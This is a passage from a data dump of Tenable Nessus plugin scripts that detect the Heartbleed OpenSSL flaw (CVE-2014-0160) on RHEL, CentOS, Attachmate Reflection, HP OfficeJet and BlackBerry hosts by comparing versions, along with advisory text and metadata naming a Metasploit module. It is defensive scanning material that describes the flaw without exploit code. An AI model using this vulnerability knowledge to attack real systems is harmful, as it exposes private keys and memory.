System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2014-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T06:41:41", "bulletinFamily": "scanner", "description": "The Attachmate Reflection install on the remote host is affected by an\nout-of-bounds read error known as the ", "modified": "2020-01-02T00:00:00", "id": "ATTACHMATE_REFLECTION_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/76309", "published": "2014-06-30T00:00:00", "title": "Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76309);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks openssl.dll version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection install on the remote host is affected by an\nout-of-bounds read error known as the 'Heartbleed Bug' in the included\nOpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/1708.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection 14.1 SP3 Update 1 (14.1.3.247) or 2014 R1 Hotfix\n4 (15.6.0.660) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\n# Ignore Attachmate Reflection X in this plugin\nforeach key (display_names)\n if (\n \"Attachmate Reflection \" >< key\n &&\n \"Attachmate Reflection X \" >!< key\n ) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\n \"Attachmate Reflection \" >!< display_name\n ||\n \"Attachmate Reflection X \" >< display_name\n )\n continue;\n key -= '/DisplayName';\n\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n isnull(display_version) ||\n display_version !~ \"^(14\\.1\\.3|15\\.6)($|[^0-9])\"\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n if (isnull(display_version))\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"14.1.3.x / 2014 R1\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nif (isnull(install_location))\n{\n RegCloseKey(handle:hklm);\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nRegCloseKey(handle:hklm);\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nclose_registry(close:FALSE);\n\npath = item[1];\n\n# At the least, make sure a file exists\n# to verify the registry info a bit\nexe = path + \"openssl.dll\";\nexe_exists = hotfix_file_exists(path:exe);\nhotfix_check_fversion_end();\nif (!exe_exists) audit(AUDIT_FN_FAIL, \"hotfix_file_exists\", \"data that indicates the file '\"+exe+\"' is no longer present.\");\n\n# Parse out numeric version from registry entry version\n# Registry version is formatted like :\n# major.minor.{sp}{build}\n# where {sp} is one digit (for now) and {build} is three\nmatches = eregmatch(string:display_version, pattern:\"^(\\d+)\\.(\\d+)\\.(\\d+)(\\d{3})\");\nif (matches)\n{\n major = matches[1];\n minor = matches[2];\n sp = matches[3];\n build = matches[4];\n version = major + \".\" + minor + \".\" + sp + \".\" + build;\n}\nelse\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n\n# 14.1.3.000 is 14 SP3 (earliest vuln)\n# 15.6.0.000 is 2014 R1 (earliest vuln)\n# Vendor states 14.1.3.247 / 15.6.0.660 is main app fix ver\nif (\n version =~ \"^14\\.\" && ver_compare(ver:version, fix:\"14.1.3.247\", strict:FALSE) < 0\n ||\n version =~ \"^15\\.\" && ver_compare(ver:version, fix:\"15.6.0.660\", strict:FALSE) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : Reflection 14.1 SP3 Update 1 (14.1.3.247) / 2014 R1 Hotfix 4 (15.6.0.660)' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, display_version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T06:42:14", "bulletinFamily": "scanner", "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "modified": "2020-01-02T00:00:00", "id": "CENTOS_RHSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73387", "published": "2014-04-08T00:00:00", "title": "CentOS 6 : openssl (CESA-2014:0376)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0376 and \n# CentOS Errata and Security Advisory 2014:0376 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73387);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/06/14 00:01:14 $\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"CentOS 6 : openssl (CESA-2014:0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3f645c53\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n \n # Remote package installed : openssl-1.0.1e-16.el6_5.4\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T08:09:51", "bulletinFamily": "scanner", "description": "According to its self-reported build information, the firmware running\non the remote HP OfficeJet printer is affected by an out-of-bounds\nread error, known as the ", "modified": "2020-01-02T00:00:00", "id": "HP_OFFICEJET_PRO_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/74270", "published": "2014-06-02T00:00:00", "title": "HP OfficeJet Printer Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74270);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"HP OfficeJet Printer Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the model/firmware of HP OfficeJet printer.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote HP OfficeJet printer is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported build information, the firmware running\non the remote HP OfficeJet printer is affected by an out-of-bounds\nread error, known as the 'Heartbleed Bug' in the included OpenSSL\nversion.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n # https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04272043\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19866791\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"HP has released firmware updates for the affected products.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:hp:officejet\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_officejet_web_detect.nbin\");\n script_require_keys(\"hp/officejet/detected\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"hp/officejet/detected\");\n\nprinter_kbs = get_kb_list_or_exit(\"hp/officejet/*/model\");\nports = make_list();\n\nforeach printer_kb (keys(printer_kbs))\n{\n matches = eregmatch(string:printer_kb, pattern:\"hp/officejet/([0-9]+)/model\");\n if (isnull(matches) || isnull(matches[1]))\n continue;\n port = int(matches[1]);\n ports = make_list(ports, port);\n}\n\n# empty list of ports\nif (isnull(keys(ports)))\n audit(AUDIT_HOST_NOT, \"HP OfficeJet Printer\");\n\nports = list_uniq(ports);\n\nport = branch(ports);\n\nkb_base = \"hp/officejet/\" + port + \"/\";\n\nproduct = get_kb_item_or_exit(kb_base + \"product\");\nmodel = get_kb_item_or_exit(kb_base + \"model\");\nfirmware = get_kb_item_or_exit(kb_base + \"firmware\");\n\n# from the HP advisory\nif (model == \"CN459A\")\n fixed_firmware = \"BNP1CN1409BR\";\nelse if (model == \"CN463A\")\n fixed_firmware = \"BWP1CN1409BR\";\nelse if (model == \"CV037A\")\n fixed_firmware = \"BZP1CN1409BR\";\nelse if (model == \"CN460A\")\n fixed_firmware = \"LNP1CN1409BR\";\nelse if (model == \"CN461A\")\n fixed_firmware = \"LWP1CN1409BR\";\nelse if (model == \"CN598A\")\n fixed_firmware = \"LZP1CN1409BR\";\nelse if (model == \"CR770A\")\n fixed_firmware = \"FRP1CN1416BR\";\nelse if (model == \"CV136A\")\n fixed_firmware = \"EVP1CN1416BR\";\nelse if (model == \"A7F64A\" ||\n model == \"D7Z36A\" ||\n model == \"A7F65A\" ||\n model == \"D7Z37A\" ||\n model == \"A7F66A\" ||\n model == \"E2D42A\" ||\n model == \"E1D36A\")\n fixed_firmware = \"FDP1CN1416AR\";\nelse\n exit(0, \"The \" + product + \" \" + model + \" listening on port \" + port + \" is not affected.\");\n\nfirmware_build = int(substr(firmware, 6, 9));\nfixed_build = int(substr(fixed_firmware, 6, 9));\n\nif (firmware_build >= fixed_build)\n exit(0, \"The \" + product + \" \" + model + \" running firmware \" + firmware + \" listening on port \" + port + \" is not affected.\");\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Printer : ' + product +\n '\\n Model : ' + model +\n '\\n Installed firmware : ' + firmware +\n '\\n Fixed firmware : ' + fixed_firmware +\n '\\n';\n security_warning(extra:report, port:port);\n}\nelse security_warning(port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T06:41:43", "bulletinFamily": "scanner", "description": "The BlackBerry Enterprise Service (BES) install on the remote host is\naffected by an out-of-bounds read error, known as the ", "modified": "2020-01-02T00:00:00", "id": "BLACKBERRY_ES_UDS_KB35882.NASL", "href": "https://www.tenable.com/plugins/nessus/73762", "published": "2014-04-29T00:00:00", "title": "BlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73762);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"BlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed)\");\n script_summary(english:\"Checks version of UDS tcnative-1.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The BlackBerry Enterprise Service (BES) install on the remote host is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://salesforce.services.blackberry.com/kbredirect/KB35882\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch referred to in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:blackberry:blackberry_enterprise_service\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"blackberry_es_installed.nasl\");\n script_require_keys(\"BlackBerry_ES/Product\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nproduct = get_kb_item_or_exit(\"BlackBerry_ES/Product\");\nversion = 